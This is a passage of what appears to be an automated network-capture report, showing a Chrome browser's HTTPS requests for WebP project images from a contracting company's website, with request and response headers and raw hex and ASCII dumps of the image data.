                                              Data Ascii: p!T"?;?wy)Mf9Knt_Oy~#}Z ?%qmw=+<kdyBTh/{%Rl654EFz-V_W+CFV9]/FBj2C+-(WI^u)_3z(piLRG2cbr&Dry`/oF"$=GC\'2Ma?'h8|5?H
                                              2024-09-27 06:20:14 UTC6531INData Raw: a1 2d f9 b4 fa 68 e8 a1 f2 2a 60 0b 02 d4 ad b8 4d 85 2e e4 f7 fa 9f d6 3f a3 34 54 53 53 61 c4 e9 c2 a4 1b a7 4b fb 94 9a c6 91 e0 78 67 96 2e 6b e5 bb 22 0b df 19 4f e1 af 9d 1f 0b 1e e3 57 eb 73 62 21 e7 1c 64 c3 1c eb 8c d2 ff e7 ea 94 91 68 a8 3f dc 44 16 9e f8 09 40 31 b9 99 92 74 f0 17 ad ad 64 bf 34 36 7a 33 28 5a 5b 05 94 aa 67 ea c0 db 0c 43 d4 c3 e0 66 58 36 6d ee 26 2a f2 e4 93 be 8c c7 61 4f ee 4d fb 32 e7 bb 35 16 24 f9 e9 26 46 64 48 54 70 83 61 0c 4c a1 ac 7e 17 7c 29 01 52 ec e8 b9 e8 e5 a6 24 4f d2 76 cf 55 e1 2d 1f 4a fd 2a c3 35 0f 7c bf 7d 8c fd e2 23 31 2d 36 bc 4f d7 c1 65 07 19 81 de d4 7d 89 04 30 74 9a 4d 75 91 f4 69 5c 95 a9 03 97 23 2d d5 31 47 39 4f 55 d8 2d 6a c4 45 46 e3 4e ef fa e1 9c b1 3a 74 42 8f ca 75 12 2f e5 ca 72 18
                                              Data Ascii: -h*`M.?4TSSaKxg.k"OWsb!dh?D@1td46z3(Z[gCfX6m&*aOM25$&FdHTpaL~|)R$OvU-J*5|}#1-6Oe}0tMui\#-1G9OU-jEFN:tBu/r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              79192.168.2.465412173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC724OUTGET /uploads/projects/22/99d0794491cfd3b80cd8a673e31ef7e3.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:33:36 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 63024
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7931INData Raw: 52 49 46 46 28 f6 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 b4 f5 00 00 50 41 05 9d 01 2a cf 04 a3 03 3e e9 6c af 51 29 2b 3f ae a6 b1 ab 7b f0 1d 09 48 38 01 78 cd af d9 e5 d3 e8 1d 52 b8 a1 ff 8f cc fc ef fd 1a bc 2b 9f 17 92 d7 9e ab a3 8d 67 d9 af fe e3 ce 9a e5 a9 6d f3 f2 17 f3 46 f5 6b e3 2b fb cf 4d 39 9f 1c 0f f0 ed 49 94 fe 9d ed 2f aa 9f 2d fa 79 1b 8c 6e 3a bf 36 ff 71 ef b7 ff 7b d7 e7 f9 0f f8 fe b7 fe 91 ff f6 fb 15 fe bd e9 13 cd 9b ce 7f a6 7b d7 53 fa 07 4d ff ae 57 f8 fc 92 df a2 fe e9 fa 64 fa 17 cd d7 95 3f 9a fd ff cb 43 03 ff 13 f3 21 ed 0f 66 ef ee fc 3d fd df f8 cf 41 af dc 3c b7 7f 2b b8 ef 58 ff 9f e8 23 ee 17 e0 bc cd 3f 63 cf 4f e9 7f d7 7b 03 ff 79 f4 27 c8 77 eb 7e 87 de 93 3e 20 be
                                              Data Ascii: RIFF(WEBPVP8XVP8 PA*>lQ)+?{H8xR+gmFk+M9I/-yn:6q{{SMWd?C!f=A<+X#?cO{y'w~>
                                              2024-09-27 06:20:14 UTC8000INData Raw: e6 a0 2c ae c9 c6 b1 e6 e0 67 b3 80 c3 3b c7 1d e9 90 30 83 f5 2f ab 2c 17 f0 4a 54 a9 a4 00 c5 c7 ec 18 65 19 f7 5f 18 8e 05 a7 4b bf 29 5e ed 46 b7 79 b3 4e 4d b0 be 0f 9d 25 7d 2c 7f 47 33 be 41 7b 03 a4 45 72 3c ef 5c 77 6b df 39 15 1f b0 2b be a3 d5 9c ec e0 ea 9f da b8 ff 1e fd cd 09 cc ec 7b a8 fb 0b e5 0e dc 58 52 6f eb c0 b0 97 22 85 5f 02 49 2b ed ad 4f e3 57 01 ba 4a 88 dd b8 8b 44 2c 3a 70 4b ce 69 94 a6 3d b7 ce 8f df 90 63 2a 19 7a b7 2c ca b4 a8 10 22 5f ba 71 fb ea d1 45 e7 c4 00 33 6b db 4c f2 32 c5 26 9a f3 fa cf ed da 32 2d ab 14 25 99 7c 0c f7 62 5b 4a 82 7e 91 40 79 8b 37 f4 2b f1 a3 13 f7 c6 29 35 1a 2b fe 2c 8e af b2 c0 51 e4 a7 f4 10 5d 7e 70 25 b4 3e 4a 1b 7b 2f 31 37 6e 33 4a 0d c2 71 7c 63 2c a7 fc b5 ee 1a e6 37 b3 a4 fe 94 b2
                                              Data Ascii: ,g;0/,JTe_K)^FyNM%},G3A{Er<\wk9+{XRo"_I+OWJD,:pKi=c*z,"_qE3kL2&2-%|b[J~@y7+)5+,Q]~p%>J{/17n3Jq|c,7
                                              2024-09-27 06:20:14 UTC8000INData Raw: 09 bf 69 00 b0 22 6e 17 46 77 16 36 1f 28 b8 ca c6 84 60 60 b0 0b f5 9c 64 0a e1 20 82 82 f1 3e d3 05 0b 48 6b d4 bb 80 3f 0f 4c ba 3d 6b e7 0d 12 7d 88 d1 48 bb fd 61 2b bf 6a 8a f1 a9 57 02 b6 ed 93 76 3c 57 70 f2 d7 3d 8b 78 d2 98 64 46 0f ba f2 97 bc 27 e2 83 34 c8 c5 e6 79 22 ad be 21 3d 93 b6 33 26 82 e2 8c cd 6e 2a f3 47 47 e4 46 d6 ac d1 55 5e 4b c2 a3 c8 78 5a 78 2b be d9 86 69 45 3e d0 1f 9b b9 dd 33 d0 7c b5 38 d8 8e cb fa be f3 85 3a 03 0f 22 49 04 8f 00 28 99 bc 8f 5f 8d 4d 07 f3 a9 42 68 19 8b 91 a5 17 f8 15 13 25 e2 f0 4c 05 7f 25 12 9d 1c 26 f1 68 4b d6 bd a5 7f aa dd a8 99 97 3c df d0 91 07 fb c0 38 cc 98 dc 9d be ed 57 c7 f0 98 fa f1 dc dd 2d 0a 90 3c d0 15 e3 49 48 6a 3a 0b 33 cc 36 05 63 e1 07 71 95 2f 06 10 31 90 9e 2e e5 bc cc af bf
                                              Data Ascii: i"nFw6(``d >Hk?L=k}Ha+jWv<Wp=xdF'4y"!=3&n*GGFU^KxZx+iE>3|8:"I(_MBh%L%&hK<8W-<IHj:36cq/1.
                                              2024-09-27 06:20:14 UTC8000INData Raw: c4 b5 4e 25 e3 85 08 43 25 d4 da a9 91 a9 61 1a 45 8c a4 a1 ec 08 9d 6e ac b9 14 c6 04 08 01 e8 58 99 6e a4 e3 ef 0b 82 8c b1 3b 12 78 db 0a 0b 53 da cf 8a f8 32 eb 49 7a 0b 4c fa cf ac 11 65 0d 14 ca 4f 9d ed ca 3b 00 84 22 2f 1d 54 dd d6 9f 6d 9e b1 b5 19 f2 33 6e 96 66 18 73 23 d8 bd c5 15 42 2c df 10 38 15 57 77 76 55 78 aa ed 31 40 f4 e9 81 31 af 9b 06 4f d7 39 78 13 0b 3c aa a6 8d 95 7c ad b1 8c 1d a9 7c d8 6c b4 b7 e0 47 6a 92 8e 8c d5 a1 a4 af c0 05 3f e1 29 71 59 73 93 f0 ad 7e ec e5 2c 94 67 a2 40 54 75 02 0a 59 80 2f 92 3b 2f 9b 75 80 49 de 4c 09 6b a1 64 27 bc 5a 9c 24 72 70 f4 99 4f 04 70 0a a9 d2 2c b4 c7 d6 34 da 34 6d 55 81 eb c6 b3 28 b6 04 a8 d3 3b d6 3c 34 c0 ab 43 aa 45 2b a4 37 4f fc 7f cf f9 45 e8 c8 ee 11 8a 69 6c 5e 74 84 b2 df df
                                              Data Ascii: N%C%aEnXn;xS2IzLeO;"/Tm3nfs#B,8WwvUx1@1O9x<||lGj?)qYs~,g@TuY/;/uILkd'Z$rpOp,44mU(;<4CE+7OEil^t
                                              2024-09-27 06:20:14 UTC8000INData Raw: 18 70 34 df 97 a2 f1 4e 6b 72 f9 e3 85 53 3c 5b 0f 09 95 c8 ac da 4b 52 29 a1 62 a3 6f 97 54 22 d8 b2 f9 4e b5 a1 be a9 2b ea 69 53 6d 63 52 c2 7c a8 4c 61 45 3b 6e 1d b7 1f f7 43 0d 29 ea f0 6d 7c dd ae 90 82 b1 be 99 f9 5d db ae 70 3b b6 01 3a ea f0 26 51 e0 a0 bd 53 48 fd 65 6a 0f 41 c1 3c 70 43 4e e7 59 ea ea d7 a5 6b ff 9b 55 31 7c 2f 03 c1 45 80 bf 91 35 51 f2 ef 05 e7 f7 cb 34 0f 8a a7 82 92 c5 76 38 3d 9b 1d d3 3f 52 17 2c 5b e1 b8 03 df c0 dc a5 22 2e dd 55 70 e5 fb df 08 c7 3a 1d 58 b1 74 b5 a6 7e e6 2d b6 4e 47 42 f4 c0 66 08 8c f4 03 5f b3 47 a0 36 9b 71 b3 2e fd 58 70 a9 45 4b 83 77 41 1a ad cf e9 5e d4 71 c9 84 d0 ff f5 43 30 c5 35 40 95 da 33 5b 5b fe ba 9e 7d 36 bf d3 45 54 db 42 74 d9 60 da e1 03 8b 52 1c 04 e2 4d 73 a2 9d 48 8b 26 f2 88
                                              Data Ascii: p4NkrS<[KR)boT"N+iSmcR|LaE;nC)m|]p;:&QSHejA<pCNYkU1|/E5Q4v8=?R,[".Up:Xt~-NGBf_G6q.XpEKwA^qC05@3[[}6ETBt`RMsH&
                                              2024-09-27 06:20:14 UTC8000INData Raw: 8e be 8b 44 bd 45 00 8b b5 dd 62 75 e6 9f aa 1f 68 3a ad 3c e7 74 da 54 e1 1f 63 d7 6c b4 d9 9f 2e 71 f4 2f 7c 28 a1 ec ab 45 43 43 f1 bb 59 08 47 47 7c a0 5e 1a 4a af 3a bc a5 1e 63 64 82 27 9a 04 b3 a3 81 f0 7f 5f 0b 49 85 a2 cc 51 dd b6 84 01 eb 7f 79 fc b7 64 63 e8 65 5f 67 51 d4 8b c6 f7 ba b0 03 60 63 80 9b 17 02 98 9e 48 6b c9 bb 15 70 da a3 de 5c 6d ec d5 cf db 6c 28 6b ac 0d 67 13 16 41 d7 82 34 51 da 91 20 55 a3 a7 0d 7e c9 46 9d 63 22 e9 1f 26 1c 7e 57 3c f3 4d 2a d3 9e 33 bf d7 21 51 a1 7c ae 10 2a 96 c6 89 3e b2 e2 46 dd 3d e2 5f 72 73 ef 0f 61 09 10 b3 97 ca a2 6f 3f 7f 10 f7 c2 ef f1 0b c7 94 99 3a dd 7b 39 ec 61 20 48 b9 f3 f9 cb 09 aa 55 37 eb 2b 57 42 a6 57 24 1a 02 bd 18 9c 65 b5 b4 43 f3 16 47 2e de 13 34 26 93 e3 26 53 6c c0 4a 18 3c
                                              Data Ascii: DEbuh:<tTcl.q/|(ECCYGG|^J:cd'_IQydce_gQ`cHkp\ml(kgA4Q U~Fc"&~W<M*3!Q|*>F=_rsao?:{9a HU7+WBW$eCG.4&&SlJ<
                                              2024-09-27 06:20:14 UTC8000INData Raw: b8 db 93 c5 d9 75 5e cb 77 4c e4 23 9b b1 b1 7b 4a 7c ed 90 ef d5 46 7b 08 6c 8e 39 f5 df 6d be b2 cd 4a e6 49 ac 0e ba f3 41 ef 21 34 4a e3 8d d1 81 fe e7 6c c1 fe 73 22 10 ab 8d 3f 79 09 32 45 ce ec d4 6b ee e4 9f 59 a7 21 2d 33 6a 75 47 f6 0f bc c2 b7 5f 4a 99 25 16 f5 92 50 73 80 f1 8c ea ce 35 c8 b4 3d a5 9e 8e 00 1a fa b6 1e c2 b0 8b 66 74 1d 08 89 76 2e f7 5f 0d 7b 12 20 3f 5b be a0 2b 75 9e f5 73 94 1a 57 56 ac cd f6 ab 0b 57 0a b8 67 ae 2a bd 90 f0 13 cd 55 43 f4 f5 46 fa c3 4f 09 03 32 16 24 a0 2b 1b 0c 5f ae 4e b3 68 c1 4f c0 7e 47 07 71 86 54 77 1b 21 ba ca e6 25 51 1d 60 a8 c3 b3 7e 15 d3 8a 6a d2 40 1e c6 8f 4c 05 f7 c0 c4 88 5e 69 23 a5 f2 51 12 ab 0b 5d 8f d7 14 03 52 f1 ba 6f 50 62 1e 50 79 8e 18 a2 6c 94 c1 70 5a e5 f9 c3 f9 53 84 54 88
                                              Data Ascii: u^wL#{J|F{l9mJIA!4Jls"?y2EkY!-3juG_J%Ps5=ftv._{ ?[+usWVWg*UCFO2$+_NhO~GqTw!%Q`~j@L^i#Q]RoPbPylpZST
                                              2024-09-27 06:20:14 UTC7093INData Raw: 4e 5b 15 f2 8a bf 39 ea 94 dd 44 ee 0a bd 97 5f bd a4 0b 8f 9b 43 78 4a df 32 a9 c1 3c 22 a5 63 e2 17 4b 5a 9e 8e b2 35 de eb 78 c9 76 a3 95 10 54 64 ff 8a 27 86 fd 27 73 a7 04 af a8 9b 3a 2a 10 7e 74 49 36 72 d3 9e 1a 45 72 89 38 3f 4c 32 c3 45 c3 62 8a 52 6a 59 83 8c 4b cc ba ce 39 a2 0c 2b 30 89 ea 13 4e 82 69 2a c5 e7 c6 9d 59 32 7b cb db 9b ec d9 e6 ae 0f e5 b5 89 d9 cc 9a c3 f4 b6 3f 10 42 15 36 da 97 4c 25 b3 ae e8 2f e6 58 82 ca 57 9d f1 bd 96 4c c9 2d 0c 85 86 e7 62 f1 78 db 27 83 f9 96 a1 e3 60 81 c7 84 4f 40 18 63 7a 8c 44 b1 42 f9 c5 30 c6 6b 73 b5 62 df ab a8 22 89 e4 00 14 80 76 f4 36 60 7c d1 9d 36 a6 ad bb 7b 72 e2 1b 35 84 8f eb 6c 3b 1a c2 1c e7 79 c9 d1 34 a3 aa 89 93 19 4b fe 3f 31 c3 28 f1 54 45 0b 36 b8 00 00 08 ee 33 32 65 d6 5b 48
                                              Data Ascii: N[9D_CxJ2<"cKZ5xvTd''s:*~tI6rEr8?L2EbRjYK9+0Ni*Y2{?B6L%/XWL-bx'`O@czDB0ksb"v6`|6{r5l;y4K?1(TE632e[H


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              80192.168.2.465416173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:14 UTC724OUTGET /uploads/projects/17/e7dd25a6640aa7bddcdaf018fbb5a7f2.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:14 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:14 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:53:04 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 43004
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:14 UTC7931INData Raw: 52 49 46 46 f4 a7 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 80 a7 00 00 90 eb 04 9d 01 2a cf 04 a3 03 3e e9 70 b0 51 a9 32 3f b2 a7 13 4a 73 f0 1d 09 65 6e 88 d8 a2 f0 de 69 ed 06 67 ca eb c8 c7 de 6a 5f 0e 38 cd 77 60 cd e0 fc 85 7b ce 41 08 61 a5 5b 6a df a8 3f eb f3 3e cd 1d c0 b4 a3 c8 3e fc 90 3f 75 f3 bb f6 ae f6 7e 55 6e b8 e3 d4 dc 1b ff e6 f3 ed f3 6f f2 7f fb 77 3d fd 17 fe 9f e8 fd aa 7f d2 fb c7 d3 e7 c8 7f e3 e3 a7 fb c7 ff ff ef fb 4d ff 8b ff ff 9b ff 40 ff ff f5 9e fd ab fa a7 ff ef eb be 5d 3c af af af a3 ef 9a bc 3d b7 18 fc 27 ff 3e cb 7f f1 bd 39 f5 11 3b 8f ff 5e a1 bf 44 ff c8 4c 78 99 e0 fc 7f a3 dc a6 cc ac 36 27 7d 61 05 94 3d c8 fb fc a1 cf b8 16 25 be b4 da 2d 86 eb f9 24 da 52 29 61 90
                                              Data Ascii: RIFFWEBPVP8XVP8 *>pQ2?Jsenigj_8w`{Aa[j?>>?u~Unow=M@]<='>9;^DLx6'}a=%-$R)a
                                              2024-09-27 06:20:14 UTC8000INData Raw: 5a b5 db f9 36 11 0d b1 f5 03 f7 ba c9 93 1a 4f 5b 46 73 20 95 92 c8 9b 67 1e 90 38 76 06 39 f0 08 6d 44 bf 79 ce aa c4 3e 45 0b 17 64 b7 68 4f 5c ae 7f 33 3a e3 5a a3 f1 d0 a6 16 c8 b5 21 a0 67 25 b1 30 db 3c 53 cd 04 06 57 c9 b9 c7 a8 8c 8f 04 3c cb 5b 69 90 86 f1 a1 54 5b 2b b4 47 da a9 99 06 57 ef 69 94 79 ba ab 83 b9 99 15 cb 4b 7b 48 2b 5c c5 4e db 3b 36 99 ec f9 70 12 8d c4 69 5e 2e e1 86 1a 0a fb 66 79 b7 fd 00 18 fc 81 31 24 9d 79 aa 17 74 41 2b a9 d0 03 8e be 93 05 9d 60 bf c1 b9 a6 a9 00 09 b7 06 2a 20 96 ae b1 b0 5c 25 79 31 92 92 fb ba c5 17 74 ac 43 bc 5c 03 0f 5a 1f a1 2e 2d 2f 22 d4 17 2b dc 63 ba 40 4f 1d 95 14 9d 2a d7 fc ac da 5a e4 31 ac 38 7d 44 52 17 80 f9 7b ad a8 d9 7e c3 a9 a5 4f 72 aa f1 de e0 75 8d e0 07 63 e4 65 b1 4f 06 4f 63
                                              Data Ascii: Z6O[Fs g8v9mDy>EdhO\3:Z!g%0<SW<[iT[+GWiyK{H+\N;6pi^.fy1$ytA+`* \%y1tC\Z.-/"+c@O*Z18}DR{~OruceOOc
                                              2024-09-27 06:20:14 UTC8000INData Raw: 45 1e 13 67 d9 23 67 56 c8 c9 82 e8 c9 9b a0 cc fb 0f 05 89 86 25 c3 59 9f 38 10 86 13 51 1b a3 7e 16 47 81 2b 8d 4a 78 a7 dc a6 01 02 a8 43 ca ca 6c 25 1e 01 bb 79 9f e6 47 ca d2 fc 2f 0c 75 4d 7e 95 56 38 89 d6 68 07 91 68 77 f8 d1 6d c2 14 5a e3 db 98 f0 cf d5 c1 2d 86 30 57 ef b6 3f 30 22 01 cf 67 49 e2 79 9b d7 ad 27 39 7c 7e 2c 49 3a 11 92 55 b3 91 47 44 5f ed 82 c8 cb 38 12 9a ca b2 4f 95 13 ed 1d 0b 6a e0 02 31 44 75 1a 45 26 62 11 52 46 d5 c2 7d 27 8c c1 4e 05 b5 48 96 24 c9 ed 92 a5 dc 01 95 09 db b6 8d 3e 55 70 b6 89 cb 98 14 2d c8 60 10 82 ba 9e 64 0e df 93 d1 d7 7d 6e ef eb 14 0a 07 6f 46 c0 9d e4 78 69 ef 80 23 e3 01 00 3b 47 8a 6a 0f 5c 32 e0 b0 d3 b0 3c 11 90 9a 6f 26 47 28 f4 ba 85 c3 e2 81 ba 07 5f 3e 7b 32 d0 69 c0 a3 32 67 47 5c 91 a8
                                              Data Ascii: Eg#gV%Y8Q~G+JxCl%yG/uM~V8hhwmZ-0W?0"gIy'9|~,I:UGD_8Oj1DuE&bRF}'NH$>Up-`d}noFxi#;Gj\2<o&G(_>{2i2gG\
                                              2024-09-27 06:20:14 UTC8000INData Raw: a4 a3 15 7f e9 14 7f 9d 0d db 94 b3 de 75 51 f6 47 cf d0 18 b2 c4 23 f1 1b f0 3c 92 e2 1a 64 8b 47 8e ce 4d cc a7 74 ce 91 2b 49 e9 b7 e2 7c b0 ed 1d 07 f9 5d a9 ee e2 9a 10 75 e3 6d 86 dd e2 63 d2 4f 77 3f 46 2b 75 81 10 a9 9e 6a 69 ed d0 09 c3 4b 01 f6 f5 9c 80 6f b4 85 2b d9 6f c0 8e 7d 32 bd ab cd 74 f7 2a 75 d2 92 c5 94 91 8b 3d 94 ca ba d3 8f 87 17 a0 56 50 a8 14 dc 2f 20 45 7e 9d 2d 2f 33 bf dc e4 87 06 06 d3 5e cc 87 20 00 36 35 43 c0 a2 2b 63 b2 eb b0 18 49 a0 ac be c5 3d f5 3a 9a 37 9b dd dc 2c 26 f4 e9 b1 ff 4b 0f 7c 22 87 5a 97 64 f1 9e 8f 6b de 3a c4 9c 27 81 e2 6c 95 b8 fa 79 81 75 63 22 17 ba c8 ae 52 29 18 b7 28 83 96 5d d8 0c 74 a9 b7 1b 79 f4 58 78 f7 ab c7 1f e9 82 3e 1b b0 48 a9 cd a7 84 c6 d4 fe 2f e8 43 1b 6c 18 1f ae bc 53 05 4b ee
                                              Data Ascii: uQG#<dGMt+I|]umcOw?F+ujiKo+o}2t*u=VP/ E~-/3^ 65C+cI=:7,&K|"Zdk:'lyuc"R)(]tyXx>H/ClSK
                                              2024-09-27 06:20:14 UTC8000INData Raw: 6b e8 e8 1a ea d9 40 2e f9 70 f0 3c 66 ef 09 6c c9 09 55 9b aa 6f 19 88 9b b3 e3 15 5e c2 b9 29 35 1a b4 34 8f ec 3f d6 74 64 64 6f cb e1 76 2a 22 9e f5 73 10 2e 7d e6 07 34 d7 af 1f ca 86 77 75 1d 60 cc 0a 6f c0 84 94 b0 47 87 97 86 79 17 6a 7d 6a 40 f2 79 6b c3 50 f9 01 f9 50 6c ed 6d df e9 45 a3 48 7b ac 20 2c e6 64 1f d1 8f 0e 88 f6 60 ab 17 70 e5 ca 8b 23 db ef 07 f9 a4 a1 ae 6c de c0 39 29 1e bd ba 33 da aa 60 56 3c bd 1f cc 7d 77 d6 da b3 e8 55 48 d5 a4 59 dd 0c 4d d3 01 c6 85 3c eb 93 66 c8 f5 d6 d1 7d e4 ef b6 31 17 88 1b c0 05 aa e5 9d 5a bb de 89 1c e1 e7 93 bd a5 c5 ad cd 09 6d a4 d7 5a 88 bc d4 70 98 b4 5a b8 bb 67 9c ee 59 14 12 ba a3 09 dc 6b 6b 84 87 76 37 cc fa d4 ce 21 70 40 2d 39 8a a7 8f ca 45 80 90 05 9f f4 e9 f2 95 85 1b 5a 45 54 69
                                              Data Ascii: k@.p<flUo^)54?tddov*"s.}4wu`oGyj}j@ykPPlmEH{ ,d`p#l9)3`V<}wUHYM<f}1ZmZpZgYkkv7!p@-9EZETi
                                              2024-09-27 06:20:14 UTC3073INData Raw: cd 72 44 c3 24 e1 18 63 d9 e6 3b 86 4d b7 b1 0c fe f2 01 82 af 3a fd b5 4f 59 3e 6e f2 ad 70 73 f5 ce fd 3b 97 f5 88 dc d7 08 f8 b7 95 16 24 84 2c a4 d3 3b 10 e1 8b 18 a1 21 01 03 a8 c9 35 f9 6a a2 2a dd 2c 02 3b 48 e9 48 ca ad 50 14 84 c5 53 44 71 52 60 ff fc a4 32 4e f6 a3 91 80 7d ff fa 1b 7b 33 a8 cf fc f3 f6 c8 6a 80 91 cf 6c dd 2c 3a 55 b3 bb 05 59 52 80 0d 77 92 07 22 0a 07 e7 9f d8 95 05 f1 d7 24 38 10 17 2f 24 c8 e4 ac bb 67 14 2a 04 47 3f 77 75 bd 13 6c 87 9a 38 73 0a 08 c6 60 b3 90 6d 6f 72 14 a9 b8 09 2c fc df 8c 94 ca f4 b3 71 58 62 f0 1c 09 55 01 cd d1 3f 64 b0 5d 17 6a 6d 40 1f e0 f0 4f 73 8b 3f 94 36 3f b3 05 f7 41 4e 85 9f 02 93 87 51 9d 38 1f 07 6b 7a 2f 56 fd 80 13 e3 92 2a 3b fc fc af ef a6 5e b5 9e f8 38 78 66 4e 9e 32 f8 b3 0e d0 35
                                              Data Ascii: rD$c;M:OY>nps;$,;!5j*,;HHPSDqR`2N}{3jl,:UYRw"$8/$g*G?wul8s`mor,qXbU?d]jm@Os?6?ANQ8kz/V*;^8xfN25


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              81192.168.2.465420173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/19/f8a20d10a257c0d0108fbe993c55b0fa.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:42:11 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56552
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7931INData Raw: 52 49 46 46 e0 dc 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 6c dc 00 00 b0 f9 04 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 2e b4 23 b4 4a ca 80 1d 09 67 6e dc c0 b6 a5 e8 ff b6 e9 93 83 46 14 4c 38 f1 ca f3 c6 f1 f9 f5 3b fd cf 59 e4 bb d1 5f 9f e2 9d 9d af 7a e9 3c fd f7 9c d6 9b 11 9f 43 bf f5 aa 75 39 aa 97 8f f1 e5 6a 79 d9 bf cc f3 e9 21 6f 30 8f 3e 9e ac f9 da 7d 21 f4 48 fa cb fa 19 f4 d1 ff 8d c9 18 f9 a7 94 6f 9b 7f 5d e0 5f a4 0f b4 ff 11 ee 3d fb de 62 fe 9b fc ff 34 7f ac 7e cd ce 2f f5 7f b6 7e 48 fc 73 ff 9b fc 87 fa 2f 71 df 6a ff b8 f4 b1 fc bf db cf f7 de 49 da 97 fb ff db 5f 61 7f 66 fe ef fb 39 ec 03 f9 3e 82 ff 55 fe 9f d8 1f fc 6f a5 7f f9 3c a0 ff 3b ea 27 fd 73 fe 2f ac 37 fc 9e 78 75 20 fe
                                              Data Ascii: RIFFWEBPVP8XVP8 l*>nS)&.#JgnFL8;Y_z<Cu9jy!o0>}!Ho]_=b4~/~Hs/qjI_af9>Uo<;'s/7xu
